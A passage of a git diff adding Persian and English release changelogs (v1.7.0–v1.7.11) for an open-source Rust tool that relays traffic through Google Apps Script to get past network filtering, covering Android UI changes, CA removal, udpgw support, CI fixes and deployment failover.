`URI Too Long` from Apps Script. Now matches both domains. Thanks Parsa307 +• Add ability to copy logs in Android ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): Copy button added next to Clear in the Live Log pane; log lines are now selectable. Before this, getting logs off the device required tethering with `adb logcat` — a barrier for users without that experience. Thanks @dazzling-no-more +• Add bulk parser for deployment IDs in Android ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): the "+ Add" field is now multi-line and accepts a paste of multiple IDs separated by whitespace/newline/comma/semicolon. Pasting into an existing entry also auto-splits and expands. Adding 6 IDs used to require 6 separate "+ Add" taps. Thanks @dazzling-no-more +• Fix "google_only mode: plain HTTP proxy requests are not supported" 502 ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): typing `http://example.com` (without https) in the browser in google_only mode returned a 502, even though `https://example.com` (CONNECT) fell through cleanly to direct TCP. Plain-HTTP proxy requests now passthrough too (honoring `upstream_socks5` if set). 4 new unit tests covering absolute-form URI parsing, Host-header fallback, and IPv6 edge cases. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.0.md b/docs/changelog/v1.7.0.md new file mode 100644 index 00000000..bbbd940e --- /dev/null +++ b/docs/changelog/v1.7.0.md @@ -0,0 +1,8 @@ + +• پشتیبانی native از پروتکل udpgw در Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node حالا یه virtual session جدید برای آدرس magic `198.18.0.1:7300` داره که tun2proxy اندروید بهش وصل می‌شه. به جای یه session UDP per-destination، تمام UDP از همون یه TCP persistent tunnel می‌گذره. **نتیجه**: تماس صوتی/تصویری Telegram و Google Meet در Full mode روی اندروید کار می‌کنن (تا قبل از این، سرعت شناوری STUN/RTP زیاد بود برای session-per-destination polling). QUIC (UDP/443) و DNS (UDP/53) به‌صورت گاردبل از udpgw مسدود می‌شن — مرورگرها به TCP/HTTPS fallback می‌کنن (سریع‌تر از QUIC over batched relay)، و DNS از virtual DNS tun2proxy استفاده می‌کنه (پایدارتر). **نیاز به redeployment image Docker tunnel-node داره**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. ممنون از @yyoyoian-pixel +• چیدمان مجدد صفحهٔ اصلی اندروید برای لیست‌های بلند deployment-ID ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258)، closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): دکمهٔ Connect/Disconnect حالا زیر فیلد Mode pinned هست — قبلاً اگه ۱۰ تا deployment ID داشتید، باید کل لیست رو scroll می‌کردید برای رسیدن به Connect. App picker هم حالا appهای از قبل انتخاب‌شده رو در بالای لیست نشون می‌ده، نه پراکنده در ترتیب alphabetical. ممنون از @dazzling-no-more +• tooling release-drafter + prepare-release ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter به‌صورت تدریجی PRهای merge شده رو در یه draft release جمع می‌کنه که در زمان tag دادن آماده هست. workflow `prepare-release.yml` (manual dispatch) خودکار `Cargo.toml` و `build.gradle.kts` رو bump می‌کنه و یه stub `docs/changelog/v.md` می‌سازه که maintainer فقط Persian half + verb tense fixes رو کامل می‌کنه. flow release موجود (matrix build → GH release → Telegram) دست نخورده. ممنون از @dazzling-no-more +--- +• Native udpgw protocol support in Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node now hosts a virtual session at the magic address `198.18.0.1:7300` that Android's tun2proxy connects to. Instead of a UDP session per destination, all UDP flows through one persistent TCP tunnel. **Result**: Telegram voice/video calls and Google Meet now work in Full mode on Android (per-destination polling previously stalled under STUN/RTP flow counts). QUIC (UDP/443) and DNS (UDP/53) are blocked from udpgw as a belt-and-suspenders guard — browsers fall back to TCP/HTTPS (faster through the batch pipeline than QUIC), and DNS uses tun2proxy's virtual DNS (more reliable). **Requires redeploying the tunnel-node Docker image**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. Thanks @yyoyoian-pixel +• Restructured Android home screen for long deployment-ID lists ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258), closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): Connect/Disconnect button is now pinned right under the Mode field — previously, with 10+ deployment IDs the user had to scroll past the entire list to reach Connect every session. App picker now shows pre-selected apps at the top instead of scattered through the alphabetical list. Thanks @dazzling-no-more +• Release-drafter + prepare-release tooling ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter incrementally accumulates merged-PR titles into a draft release that's ready when it's tag time. The `prepare-release.yml` workflow (manual dispatch) auto-bumps `Cargo.toml` and `build.gradle.kts` and writes a `docs/changelog/v.md` stub the maintainer only has to translate to Persian and fix verb tenses on. Existing release flow (matrix build → GH release → Telegram) untouched. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.1.md b/docs/changelog/v1.7.1.md new file mode 100644 index 00000000..79582d63 --- /dev/null +++ b/docs/changelog/v1.7.1.md @@ -0,0 +1,4 @@ + +• امکان حذف CA به‌صورت verified ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): فلگ جدید `mhrv-rs --remove-cert` (CLI) و دکمهٔ **Remove CA** در UI دسکتاپ. CA رو از trust store سیستم‌عامل (Keychain مک، anchor dirs لینوکس، Trusted Root ویندوز)، NSS مرورگرها (Firefox/Chrome در لینوکس)، و فولدر `ca/` روی دیسک پاک می‌کنه. **`config.json` و deployment Apps Script شما دست نمی‌خوره — نیاز به redeploy نیست.** قبل از هر کاری با store، یه trust verification by-name انجام می‌شه؛ اگه remove از سیستم‌عامل fail بشه، browser state دست نمی‌خوره و حالت `RemovalIncomplete` گزارش می‌شه (retry idempotent). در Unix، اگه با sudo اجرا بشه، HOME رو به user واقعی re-root می‌کنه تا path‌های user-scoped (NSS profile، login keychain) به /root نرن. ۲۹ unit test جدید پوشش‌دهی pure logic. تست شده end-to-end در ویندوز، و **در v1.7.1 من مسیر macOS رو هم با hardware واقعی verify کردم** (login keychain delete کار می‌کنه، NSS certutil-missing graceful fallback می‌ده). مسیر Linux منتظر تست از کاربرها. ممنون از @dazzling-no-more +--- +• Verified CA removal ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): new `mhrv-rs --remove-cert` flag (CLI) and a **Remove CA** button in the desktop UI. Clears the CA from the OS trust store (macOS Keychain, Linux anchor dirs, Windows Trusted Root), NSS browser stores (Firefox/Chrome on Linux), and the on-disk `ca/` directory. **`config.json` and your Apps Script deployment are never touched — no redeploy needed.** A by-name trust verification runs *before* any browser-state mutation; if the OS removal fails, browser state is left alone and the call returns `RemovalIncomplete` (idempotent retries). On Unix, if invoked under sudo, `HOME` is re-rooted to the real user so user-scoped paths (NSS profile, login keychain) target the user, not root. 29 new unit tests covering the pure logic. Tested end-to-end on Windows by the contributor, and **the macOS path was verified on real hardware** during merge (login-keychain delete works; NSS-certutil-missing path falls back cleanly). Linux paths await user testing. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.10.md b/docs/changelog/v1.7.10.md new file mode 100644 index 00000000..6af68b83 --- /dev/null +++ b/docs/changelog/v1.7.10.md @@ -0,0 +1,8 @@ + +• رفع باگ "GET کامل غیرضروری وقتی Apps Script body gzip رو decode می‌کنه" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): وقتی Apps Script یه gzip body رو decode می‌کرد ولی Content-Range origin رو unchanged نگه می‌داشت، validation strict ما اون response رو reject می‌کرد + یک GET کامل دوباره می‌فرستادیم — quota Apps Script هدر می‌رفت. fix carve-out اضافه می‌کنه: اگر Content-Range proves entity کامل در probe اول گنجیده، 206 رو به 200 rewrite کنیم بدون refetch. validation strict برای real Range request‌های client + chunkهای بعدی حفظ شده. همچنین تشخیص quota error برای string‌های آلمانی (`bandbreitenkontingent`، `datenübertragungsrate`) و generic (`bandwidth`، `transfer rate`، `limit exceeded`) اضافه شد، تا deployment‌هایی که رو quota account‌های Google غیرانگلیسی هستند به‌درستی blacklist بشن. ممنون از @freeinternet865 +• رفع UI Android "Config detected in clipboard" که روی Android 13+ سپس از resume کار نمی‌کرد ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ دسترسی clipboard background-to-foreground رو محدود می‌کنه — auto-detect ساکت empty می‌گرفت + banner ظاهر نمی‌شد. fix: یک دکمهٔ permanent **Paste** که روی tap clipboard رو می‌خونه (user interaction permission می‌ده در همه versionها). دکمهٔ Export به‌صورت icon-only تا row بهینه باقی بمونه. ممنون از @yyoyoian-pixel +• Fix CI workflow incompatibility for Win7 i686 build ([#318 follow-up](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)): job pinned-Rust-1.77.2 برای target Win7 i686 fail می‌کرد چون `Cargo.lock` (تولید شده توسط Rust ≥1.78) از lockfile version 4 استفاده می‌کرد + Rust 1.77 فقط version 3 رو می‌فهمه. regenerate Cargo.lock فقط روی job pinned اضافه شد — مهم: artifact `mhrv-rs-windows-i686.zip` که در v1.7.9 missing بود، در v1.7.10 reappear می‌کنه (Win7 SP1-loadable). +--- +• Fix "unnecessary fallback full GET when Apps Script decodes a gzip body" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): when Apps Script decoded a gzip body but echoed the origin's compressed `Content-Range` unchanged, our strict validator rejected the response and we'd retry with a full GET — wasting Apps Script quota. The fix adds a carve-out: if `Content-Range` proves the entity already fits in the synthetic first probe, rewrite the 206 to a 200 and skip the refetch. Strict validation is still applied to real client `Range` requests and to later chunks. Also adds quota-error string matching for German (`bandbreitenkontingent`, `datenübertragungsrate`) and generic (`bandwidth`, `transfer rate`, `limit exceeded`) phrasings, so deployments hitting quota under non-English Google account locales now blacklist correctly. Thanks @freeinternet865. +• Fix Android "Config detected in clipboard" banner that silently broke on Android 13+ after resume ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ restricts background-to-foreground clipboard access, so `getPrimaryClip()` during recomposition silently returned empty — the banner never showed. Fix: replace the auto-detect banner with a permanent **Paste** button that reads on tap (user interaction grants clipboard access on every Android version). Export button becomes icon-only to keep the row compact. Thanks @yyoyoian-pixel. +• Fix the CI Win7 i686 build that silently regressed in v1.7.9 ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318) follow-up): the pinned-Rust-1.77.2 job for the i686 target failed because `Cargo.lock` (generated by stable Rust ≥1.78) uses lockfile version 4, which Rust 1.77 doesn't understand. The job now regenerates the lockfile with the pinned toolchain before building. The `mhrv-rs-windows-i686.zip` artifact that disappeared from the v1.7.9 release page reappears in v1.7.10 (and now actually loads on Win7 SP1). diff --git a/docs/changelog/v1.7.11.md b/docs/changelog/v1.7.11.md new file mode 100644 index 00000000..4de1518d --- /dev/null +++ b/docs/changelog/v1.7.11.md @@ -0,0 +1,4 @@ + +• v1.7.10 release page assets منتشر نشد (CI failures): دو bug همزمان بودن — (۱) target `i686-pc-windows-msvc` که در v1.7.7 برای Win7 32-bit اضافه شده بود، در v1.7.10 fail کرد چون Rust 1.77.2 (آخرین stable Win7-compat) نمی‌تونه manifest crate‌های مدرن مثل `time` 0.3.47 رو parse کنه؛ pinning transitive crate‌ها در هر release dep MSRV بمپ می‌کنن غیرقابل دفاع است. (۲) job `release` با `actions/download-artifact@v4` با ۵-retry-exhausted error fail شد. **Fix:** target i686 از matrix حذف شد (کاربران Win7 ۳۲ بیتی باید self-build کنن — instructions در [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318))؛ release و telegram jobs به `gh run download` با retry loop ۳-attempt تبدیل شدن. v1.7.11 release اولین کاملی هست که از v1.7.9 منتشر می‌شه با همه fixهای v1.7.10 (Apps Script range probe + Android Paste button) plus این workflow fix. +--- +• v1.7.10 release page assets failed to publish (CI failures): two concurrent bugs — (1) the `i686-pc-windows-msvc` target added in v1.7.7 for Win7 32-bit support broke in v1.7.10 because Rust 1.77.2 (the last stable that produces Win7-compatible binaries) can't parse the manifest of modern transitive crates like `time` 0.3.47; pinning transitives at every release where a dep bumps MSRV is brittle and unsustainable. (2) The `release` job's `actions/download-artifact@v4` step hit a 5-retries-exhausted error. **Fix:** dropped the i686 target from the matrix entirely (Win7 32-bit users must self-build now — instructions in [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)); the `release` and `telegram` jobs now use `gh run download` with a 3-attempt retry loop. v1.7.11 is the first complete release published since v1.7.9 and ships all the v1.7.10 fixes (Apps Script range probe handling per #337, Android Paste button per #344) along with this workflow repair. diff --git a/docs/changelog/v1.7.2.md b/docs/changelog/v1.7.2.md new file mode 100644 index 00000000..22be861d --- /dev/null +++ b/docs/changelog/v1.7.2.md @@ -0,0 +1,4 @@ + +• import/export کانفیگ در نسخهٔ اندروید با QR code، کلیپ‌بورد، deep link، و share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): انتقال کانفیگ بین دستگاه‌ها با یک تپ. **Export**: یک دیالوگ یکپارچه با QR code + رشتهٔ فشرده + دکمهٔ کپی، یا Share از طریق هر اپ (تلگرام، WhatsApp، ایمیل). فیلدهای device-specific (پورت‌ها، حالت VPN/proxy، splitMode) export نمی‌شن، فقط فیلدهای منطقی (mode، script_ids، auth_key، sni_hosts، passthrough_hosts، upstream_socks5). encoding با DEFLATE compression + base64 — کانفیگ معمولی ~۲۰۰ کاراکتر می‌شه به‌جای ~۸۰۰. **Import**: clipboard banner خودکار وقتی مهرو متن `mhrv-rs://` یا JSON خام در clipboard می‌بینه، scanner QR، یا deep link `mhrv-rs://...` (تپ روی لینک در هر اپ). **هر import نیاز به تأیید صریح کاربر داره** — قبل از overwrite شدن کانفیگ فعلی، یه دیالوگ deployment IDهای جدید رو نشون می‌ده و هشدار میده که "این لینک ترافیک شما رو از طریق این deployment IDها مسیریابی می‌کنه — فقط از منابع قابل اعتماد import کنید." این مهمه چون کانفیگ شامل auth_key هست. ممنون از @yyoyoian-pixel +--- +• Config import/export on Android via QR code, clipboard, deep link, and share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): one-tap config sharing between devices. **Export**: a unified dialog with QR code + compressed text hash + copy button, or Share via any app (Telegram, WhatsApp, email). Device-specific fields (ports, VPN/proxy mode, splitMode) are not exported — only logical config (mode, script_ids, auth_key, sni_hosts, passthrough_hosts, upstream_socks5). DEFLATE compression + base64 encoding shrinks a typical config from ~800 to ~200 chars. **Import**: clipboard banner auto-appears when mhrv-rs detects `mhrv-rs://...` or raw JSON in clipboard, QR scanner, or deep link `mhrv-rs://...` (tap from any app). **Every import path requires explicit user confirmation** — before the current config is overwritten, a dialog displays the new deployment IDs and warns "this link routes your traffic through these deployment IDs — only import from sources you trust." Important because the config contains `auth_key`. Thanks @yyoyoian-pixel diff --git a/docs/changelog/v1.7.3.md b/docs/changelog/v1.7.3.md new file mode 100644 index 00000000..d7ae76cf --- /dev/null +++ b/docs/changelog/v1.7.3.md @@ -0,0 +1,4 @@ + +• حذف نیاز به فورک tun2proxy ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 از یه فورک شخصی tun2proxy (با پارامتر `udpgw_server` در JNI) استفاده می‌کرد چون upstream هنوز feature flag `udpgw` رو منتشر نکرده بود. حالا که tun2proxy 0.7.21 رسماً روی crates.io با feature flag `udpgw` در دسترسه + maintainer toolchain CLI API رو به‌عنوان مسیر صحیح برای کاربران Android معرفی کرد، فورک رو حذف می‌کنیم. روش جدید: mhrv-rs از طریق `dlsym` در زمان اجرا تابع `tun2proxy_run_with_cli_args` رو از `libtun2proxy.so` resolve می‌کنه و CLI args ساده می‌فرسته (`--proxy socks5://127.0.0.1:1081 --tun-fd --udpgw-server 198.18.0.1:7300 ...`). نه فورک، نه `[patch.crates-io]`، نه commit SHA. وقتی tun2proxy update می‌شه، فقط نسخهٔ crates.io رو bump می‌کنیم. ممنون از @yyoyoian-pixel +--- +• Drop the tun2proxy fork dependency ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 used a personal fork of tun2proxy (with a `udpgw_server` parameter added to the JNI signature) because upstream hadn't published the `udpgw` feature flag yet. With tun2proxy 0.7.21 now on crates.io with `udpgw` feature flag, and the upstream maintainer pointing callers at the C-style CLI API as the recommended path for Android, we drop the fork. New approach: mhrv-rs resolves `tun2proxy_run_with_cli_args` from `libtun2proxy.so` at runtime via `dlsym` and passes a simple CLI string (`--proxy socks5://127.0.0.1:1081 --tun-fd --udpgw-server 198.18.0.1:7300 ...`). No fork, no `[patch.crates-io]`, no pinned SHA. Future tun2proxy upgrades are a single Cargo version bump. Thanks @yyoyoian-pixel diff --git a/docs/changelog/v1.7.4.md b/docs/changelog/v1.7.4.md new file mode 100644 index 00000000..869109b1 --- /dev/null +++ b/docs/changelog/v1.7.4.md @@ -0,0 +1,6 @@ + +• رفع باگ "video timeout با send YouTube through relay" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): قبلاً وقتی `youtube_via_relay = true` بود، تمام دامنه‌های مرتبط با YouTube از طریق Apps Script رد می‌شدن، شامل `googlevideo.com` (chunkهای video) و `ytimg.com` (thumbnails). نتیجه: یک chunk timeout کل پخش video رو در Firefox abort می‌کرد، و video طولانی به ۶ دقیقه cap اجرای Apps Script می‌خورد. **Fix:** حالا `youtube_via_relay` فقط API/HTML رو از relay رد می‌کنه (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — جایی که Restricted Mode enforce می‌شه)، در حالی که CDNهای video/image مستقیماً از Google edge می‌گذرن (`googlevideo.com` که در نسخه‌های قبل اصلاً در لیست SNI rewrite نبود اضافه شد، `ytimg.com`، `ggpht.com`). نتیجه: Restricted Mode بدون قطع شدن video. ممنون از @amirabbas117 برای تحلیل دقیق +• Negative-cache برای destinationهای unreachable + pre-warm بزرگ‌تر در startup ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): گوشی‌های بدون IPv6 وقتی پروب IPv6-only host (مثلاً `ds6.probe.whatismyipaddress.com`) می‌فرستن، 5+ batch Apps Script در ثانیه روی destination تضمین‌fail هدر می‌رفت. حالا cache 30s × 256-entry در `TunnelMux` نگه می‌داره برای destinationهایی که tunnel-node با `Network is unreachable` یا `No route to host` پاسخ داده — short-circuit به `502 Bad Gateway` (HTTP CONNECT) یا `0x04 Host unreachable` (SOCKS5) برای هر retry بعدی. Pre-warm pool startup هم بزرگتر شد (۱۲ تا ۲۴ connection به‌جای ۸) برای کمتر شدن first-use latency. ممنون از @dazzling-no-more +--- +• Fix "video timeout when 'Send YouTube through relay' is on" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): previously, `youtube_via_relay = true` routed every YouTube-related domain through Apps Script — including `googlevideo.com` (video chunks) and `ytimg.com` (thumbnails). Result: a single chunk timeout aborted entire Firefox playbacks, and long videos hit Apps Script's 6-min execution cap mid-playback. **Fix:** `youtube_via_relay` now only relays the API/HTML hosts (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — where Restricted Mode is enforced), while video/image CDNs go direct via Google edge (`googlevideo.com` was missing from the SNI rewrite list entirely; now added; `ytimg.com`, `ggpht.com` stay on SNI rewrite always). Restricted Mode bypass without breaking playback. Thanks @amirabbas117 for the detailed analysis +• Negative-cache for unreachable destinations + larger startup pre-warm pool ([#280](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/280)): on devices without IPv6, OS/app probes to IPv6-only hostnames (e.g. `ds6.probe.whatismyipaddress.com`) were burning 5+ Apps Script batches per second on a guaranteed-fail destination. `TunnelMux` now keeps a 30s × 256-entry cache of destinations the tunnel-node returned `Network is unreachable` / `No route to host` for, and short-circuits subsequent CONNECTs with `502 Bad Gateway` (HTTP CONNECT) or `0x04 Host unreachable` (SOCKS5). Startup pre-warm pool also grew (12 → 24 connections) to reduce first-use latency. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.5.md b/docs/changelog/v1.7.5.md new file mode 100644 index 00000000..5696630f --- /dev/null +++ b/docs/changelog/v1.7.5.md @@ -0,0 +1,6 @@ + +• گزینهٔ جدید `block_quic` در config برای رد کردن client-side QUIC ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): با `"block_quic": true` در `config.json`، listener SOCKS5 UDP هر datagramی به مقصد port 443 (یعنی HTTP/3-over-UDP) رو silent drop می‌کنه. browser به TCP/HTTPS fallback می‌کنه (که از مسیر CONNECT معمولی رد می‌شه و از relay می‌گذره). برای کاربرهایی که QUIC TCP-meltdown رو در Full mode تجربه می‌کنن (پهنای باند < 1 Mbps در عوض > 50 Mbps با TCP/HTTPS) خوبه. به‌صورت opt-in (پیش‌فرض false). ممنون از @w0l4i +• release artifacts دوباره به پوشهٔ `releases/` در مخزن commit می‌شن (به درخواست کاربر تلگرام): پس از v1.1.0 این عادت متوقف شده بود — حالا بعد از هر release tag، workflow خودکار فایل‌های pre-built رو در پوشه `releases/` به‌روزرسانی می‌کنه. کاربرانی که به صفحه GitHub Releases دسترسی ندارن (به‌خاطر فیلتر در ایران) می‌تونن از طریق `Code → Download ZIP` به فایل‌های آخرین نسخه برسن. صفحه release رسمی همچنان artifact‌های versioned رو داره — این پوشه fallback هست +--- +• New `block_quic` config option for client-side QUIC drop ([#213](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/213)): set `"block_quic": true` in `config.json` and the SOCKS5 UDP relay silently drops any datagram destined for port 443 (HTTP/3-over-UDP). The client's QUIC stack retries a couple of times and then falls back to TCP/HTTPS, which goes through the regular CONNECT path and through the relay. Useful for users seeing QUIC TCP-meltdown in Full mode (sub-1 Mbps where TCP/HTTPS does 50+). Opt-in (default false). Thanks @w0l4i +• Release artifacts now committed back to the in-repo `releases/` folder (per Telegram channel request): the practice was stopped after v1.1.0 — now after every release tag, the workflow auto-refreshes `releases/` with the pre-built binaries. Users behind GitHub-Releases-page filtering can grab the latest version via `Code → Download ZIP`. The official release page still has versioned artifacts; the in-repo folder is the fallback path diff --git a/docs/changelog/v1.7.6.md b/docs/changelog/v1.7.6.md new file mode 100644 index 00000000..58d20ef0 --- /dev/null +++ b/docs/changelog/v1.7.6.md @@ -0,0 +1,4 @@ + +• Revert غلط v1.7.4 برای `googlevideo.com` ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)، [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 تلاش کرد `googlevideo.com` رو به لیست SNI rewrite اضافه کنه به این تئوری که chunk‌های ویدیو باید از Apps Script relay دور بزنن. **چندین کاربر گزارش دادن که v1.7.4 YouTube رو کاملاً شکست داد** — علت: `googlevideo.com` توسط edge IP‌های جدا "EVA" گوگل serve می‌شه، نه GFE IP عادی که `google_ip` کاربر معمولاً به اون اشاره می‌کنه. SNI-rewrite کردن `googlevideo.com:443` به یه GFE IP باعث TLS handshake failure یا wrong-cert error برای اون کاربرها شد. **رفتار قبل از v1.7.4 برگشته** (chunk‌های ویدیو از مسیر Apps Script relay می‌رن — کندتر ولی روی هر GFE IP قابل اعتماد). تغییرات `youtube_via_relay` carve-out از v1.7.4 (که `ytimg.com` رو از relay پاک کرد) دست نخورده — اون regression جدا بود و درست شده باقی مونده. اگه کاربری در آینده EVA edge IP خودش رو پیکربندی بکنه، یه knob مجزا اضافه می‌کنیم. +--- +• Revert v1.7.4 `googlevideo.com` SNI rewrite ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275), [#281](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/281)): v1.7.4 added `googlevideo.com` to the SNI rewrite list on the theory that video chunks should bypass the Apps Script relay. **Multiple users reported v1.7.4 broke YouTube entirely** — root cause: `googlevideo.com` is served by Google's separate "EVA" edge IPs, not the regular GFE IPs that `google_ip` typically points at. SNI-rewriting `googlevideo.com:443` to a GFE IP got TLS handshake failures or wrong-cert errors for those users. **Pre-v1.7.4 behaviour is restored** (video chunks go via the Apps Script relay path — slower but reliable on every GFE IP). The other v1.7.4 `youtube_via_relay` carve-out changes (which removed `ytimg.com` from the carve-out) are intact — those were a separate fix that's still correct. If a user ever wants direct googlevideo.com routing, that needs a separate config knob letting them specify their EVA edge IP independently. diff --git a/docs/changelog/v1.7.7.md b/docs/changelog/v1.7.7.md new file mode 100644 index 00000000..13f3cf54 --- /dev/null +++ b/docs/changelog/v1.7.7.md @@ -0,0 +1,6 @@ + +• اضافه شدن build برای ویندوز ۳۲ بیتی (i686-pc-windows-msvc) به matrix release ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): کاربری که سیستم قدیمی ویندوز ۳۲ بیتی داشت درخواست build اختصاصی کرد. حالا artifact ‫`mhrv-rs-windows-i686.zip`‬ هم در release page موجوده. ممنون از @amiralishoja برای PR +• رفع باگ "یک deployment معیوب همه ‍session‌ها رو روی cadence legacy گیر می‌اندازه" ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): قبلاً وقتی یکی از deployment‌ها fast-empty (long-poll نمی‌شناخت) برمی‌گردوند، flag global `server_no_longpoll` فعال می‌شد و کل session‌ها رو روی cadence ۳۰ ثانیه‌ای legacy گیر می‌انداخت — حتی اگه deployment‌های دیگه راحت long-poll می‌کردن. اون flag همچنین هیچ‌وقت reset نمی‌شد، پس tunnel-node بازنشانده تا restart process به مسیر سریع برنمی‌گشت. **Fix:** state per-deployment با TTL ۶۰ ثانیه. flag aggregate فقط وقتی فعال می‌شه که **همه** deployment‌های یکتا mark شده باشن، و خودش رو از روی expiry self-correct می‌کنه. tunnel-node ارتقا داده شده خودش به مسیر long-poll fast بدون restart برمی‌گرده. ۴ تست جدید با `tokio::test(start_paused = true)` پوشش‌دهی timing logic. ممنون از @dazzling-no-more +--- +• Add 32-bit Windows (i686-pc-windows-msvc) to the release matrix ([#272](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/272), [#288](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/288)): a user with a legacy 32-bit Windows machine asked for a dedicated build. `mhrv-rs-windows-i686.zip` now appears alongside the other artifacts on every release page. Thanks @amiralishoja for the PR +• Fix "one degraded deployment drags all sessions onto the legacy cadence" bug ([#290](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/290)): previously, a single fast-empty observation from any one deployment flipped the global `server_no_longpoll` flag, dragging every session onto the 30-second legacy cadence even when the other deployments were happily long-polling. The flag also never reset, so a redeployed/recovered tunnel-node didn't return to the fast path until the mhrv-rs process restart. **Fix:** state is now per-deployment with a 60-second TTL. The aggregate flag flips only when **every** unique configured deployment is marked, and self-corrects on read when entries expire. An upgraded tunnel-node rejoins the long-poll fast path on its own. 4 new tests using `tokio::test(start_paused = true)` to cover the timing logic without burning real wall-clock seconds. Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.8.md b/docs/changelog/v1.7.8.md new file mode 100644 index 00000000..6f7d9030 --- /dev/null +++ b/docs/changelog/v1.7.8.md @@ -0,0 +1,4 @@ + +• Blacklist خودکار deployment با timeout مکرر در batch ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): قبلاً وقتی یک deployment hang می‌کرد (معمولاً به دلیل `TUNNEL_SERVER_URL` قدیمی که به host از کار افتاده اشاره می‌کرد، یا Apps Script که UrlFetchApp داخلش hang کرده بود)، round-robin مدام trafficرو به همون deployment می‌فرستاد و sessionها timeout می‌خوردند بدون recovery تا restart process. **Fix:** state per-deployment با window ۳۰ ثانیه‌ای — ۳ timeout در پنجره ۳۰ ثانیه‌ای منجر به blacklist با cooldown ۱۲۰ ثانیه می‌شه. هر batch موفق strikeها رو پاک می‌کنه. cooldown کوتاه (۲ دقیقه به‌جای ۱۰ دقیقه برای quota) تا deploymentای که سریع recover می‌شه به‌سرعت برگرده. مستقل از blacklist موجود برای quota-error (که هنوز ۱۰ دقیقه cooldown داره). برای scenario `5 از 8 deployment کهنه`: بعد از یک batch، ۳ deployment dropped می‌شن و session جدید با احتمال خیلی بیشتر روی deployment سالم می‌افته. ممنون از @dazzling-no-more +--- +• Auto-blacklist deployments after sustained batch timeouts ([#319](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/319)): previously, when a single deployment hung (most commonly due to a stale `TUNNEL_SERVER_URL` pointing at a dead host, or Apps Script's internal `UrlFetchApp` stalling), round-robin kept dispatching real traffic to it. Sessions piled into the bad deployment and timed out without recovery until the user restarted mhrv-rs. **Fix:** per-deployment strike counter with a 30-second sliding window — 3 timeouts in 30 s triggers a 120-second cooldown blacklist. Any successful batch clears the strike counter, so unrelated transient blips can't accumulate across hours. Short cooldown (2 min vs. the 10 min permanent-blacklist for quota errors) so a deployment that recovers rejoins the round-robin quickly. For the "5 of 8 deployments stale" scenario: after one batch each, the 3 dead deployments drop out and new sessions land on healthy deployments with much higher probability. Distinct from the quota blacklist (still 600s cooldown). Thanks @dazzling-no-more diff --git a/docs/changelog/v1.7.9.md b/docs/changelog/v1.7.9.md new file mode 100644 index 00000000..15a7c657 --- /dev/null +++ b/docs/changelog/v1.7.9.md @@ -0,0 +1,4 @@ + +• رفع باگ "binary i686 ویندوز روی Windows 7 ۳۲ بیتی load نمی‌شه" ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)، [#323](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/323)): از Rust 1.78 (می ۲۰۲۴) std `GetSystemTimePreciseAsFileTime` (Win8+) رو به‌جای 